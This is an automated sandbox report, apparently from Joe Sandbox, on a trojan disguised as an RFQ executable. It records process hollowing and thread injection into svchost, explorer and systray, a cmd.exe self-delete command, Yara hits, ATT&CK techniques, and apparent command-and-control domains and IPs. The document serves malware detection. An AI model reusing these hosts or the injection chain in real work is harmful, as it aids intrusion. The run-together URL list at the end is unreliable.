Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h] | 2_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h] | 2_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h] | 2_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] | 2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] | 2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h] | 2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] | 2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h] | 2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] | 2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h] | 2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h] | 2_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] | 2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h] | 2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h] | 2_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h] | 2_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h] | 2_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104940 mov eax, dword ptr fs:[00000030h] | 2_2_03104940
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] | 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] | 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h] | 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h] | 2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h] | 2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h] | 2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] | 2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h] | 2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h] | 2_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h] | 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] | 2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h] | 2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h] | 2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] | 2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h] | 2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h] | 2_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h] | 2_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h] | 2_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h] | 2_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] | 2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h] | 2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h] | 2_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] | 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] | 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] | 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h] | 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] | 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h] | 2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h] | 2_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] | 2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h] | 2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h] | 2_2_03042840
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_001381F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 1_2_001381F7
Source: C:\Windows\SysWOW64\svchost.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0010A364 SetUnhandledExceptionFilter, | 1_2_0010A364
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0010A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 1_2_0010A395
Source: C:\Windows\SysWOW64\systray.exe | Code function: 4_2_00671B93 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 4_2_00671B93

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | Network Connect: 76.223.105.230 80
Source: C:\Windows\explorer.exe | Network Connect: 188.114.97.3 80
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 3504
Source: C:\Windows\SysWOW64\systray.exe | Thread register set: target process: 3504
Source: C:\Windows\SysWOW64\svchost.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\svchost.exe | Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 670000
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 311008
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00138C93 LogonUserW, | 1_2_00138C93
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_000E3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 1_2_000E3B4C
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_000E4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 1_2_000E4A35
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00144EC9 mouse_event, | 1_2_00144EC9
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe"
Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_001381F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 1_2_001381F7
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00144C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, | 1_2_00144C03
Source: MKCC-MEC-RFQ-115-2024.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000002.3876685706.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1435132892.0000000001071000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
Source: MKCC-MEC-RFQ-115-2024.exe, explorer.exe, 00000003.00000002.3876685706.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1435132892.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.3876685706.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1435132892.0000000001071000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.3876685706.0000000001071000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1435132892.0000000001071000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000003.00000002.3876113416.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1434848584.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progmanq
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0010886B cpuid | 1_2_0010886B
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_001150D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, | 1_2_001150D7
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00122230 GetUserNameW, | 1_2_00122230
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_0011418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, | 1_2_0011418A
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_000E4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 1_2_000E4AFE

          Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: MKCC-MEC-RFQ-115-2024.exe | Binary or memory string: WIN_81
Source: MKCC-MEC-RFQ-115-2024.exe | Binary or memory string: WIN_XP
Source: MKCC-MEC-RFQ-115-2024.exe | Binary or memory string: WIN_XPe
Source: MKCC-MEC-RFQ-115-2024.exe | Binary or memory string: WIN_VISTA
Source: MKCC-MEC-RFQ-115-2024.exe | Binary or memory string: WIN_7
Source: MKCC-MEC-RFQ-115-2024.exe | Binary or memory string: WIN_8
Source: MKCC-MEC-RFQ-115-2024.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00156596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,1_2_00156596
Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe | Code function: 1_2_00156A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00156A5A
MITRE ATT&CK Matrix (rendered as a table in the original report; tactic columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact)

Techniques flagged for this sample (per-technique signature counts are not recoverable from the extracted text): Valid Accounts, Native API, DLL Side-Loading, Exploitation for Privilege Escalation, Disable or Modify Tools, Input Capture, System Time Discovery, Archive Collected Data, Ingress Tool Transfer, System Shutdown/Reboot, Shared Modules, Deobfuscate/Decode Files or Information, Account Discovery, Encrypted Channel, Command and Scripting Interpreter, Obfuscated Files or Information, File and Directory Discovery, Clipboard Data, Non-Application Layer Protocol, Access Token Manipulation, System Information Discovery, Application Layer Protocol, Process Injection, Security Software Discovery, Virtualization/Sandbox Evasion, Process Discovery, Application Window Discovery, System Owner/User Discovery.
Behavior Graph (ID: 1467059)
Sample: MKCC-MEC-RFQ-115-2024.exe | Start date: 03/07/2024 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: www.momura.xyz; www.bvlazaedi.xyz (Performs DNS queries to domains with low reputation); 16 other IPs or domains
  Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
  started: MKCC-MEC-RFQ-115-2024.exe (4)
    Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
    started: svchost.exe
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 3 other signatures
      injected: explorer.exe (86, 1)
        DNS/IP: www.gb-electric-wheelchairs-8j.bond 185.53.179.91, 49715, 80, TEAMINTERNET-ASDE Germany; gt.huhusddfnsuegcdn.com 194.41.37.158, 49716, 80, SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHK unknown; 3 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit)
        started: systray.exe
          Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
          started: cmd.exe (1)
            started: conhost.exe

Source | Detection | Scanner | Label | Link
MKCC-MEC-RFQ-115-2024.exe | 39% | ReversingLabs | Win32.Trojan.Strab |
MKCC-MEC-RFQ-115-2024.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
Name | Source | Malicious | Antivirus Detection | Reputation
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.00050516.xyzexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.ujgddhhfeffsfgg2.group/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://android.notify.windows.com/iOSpexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&ocexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-oexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://api.msn.com/rTexplorer.exe, 00000003.00000003.3086041137.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438602211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3881532572.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.topallinoneaccounting.com/ts59/explorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.ujgddhhfeffsfgg2.group/ts59/www.modleavedepts.onlineexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000003.00000003.3083765544.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1436716038.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3879471360.0000000007058000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000002.3881369935.00000000085E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1438491997.00000000085D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290624703.00000000085E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3082368155.00000000085E3000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.gb-electric-wheelchairs-8j.bond/ts59/www.76466.clubexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://word.office.comexplorer.exe, 00000003.00000002.3885261844.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292171112.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1440884138.000000000BDFE000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.ec-delivery-jobs-8j.bondexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.topallinoneaccounting.com/ts59/www.zangbreaker.comexplorer.exe, 00000003.00000003.2292081918.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3088485333.000000000C29F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3886713594.000000000C29F000.00000004.00000001.00020000.00000000.sdmpfalse
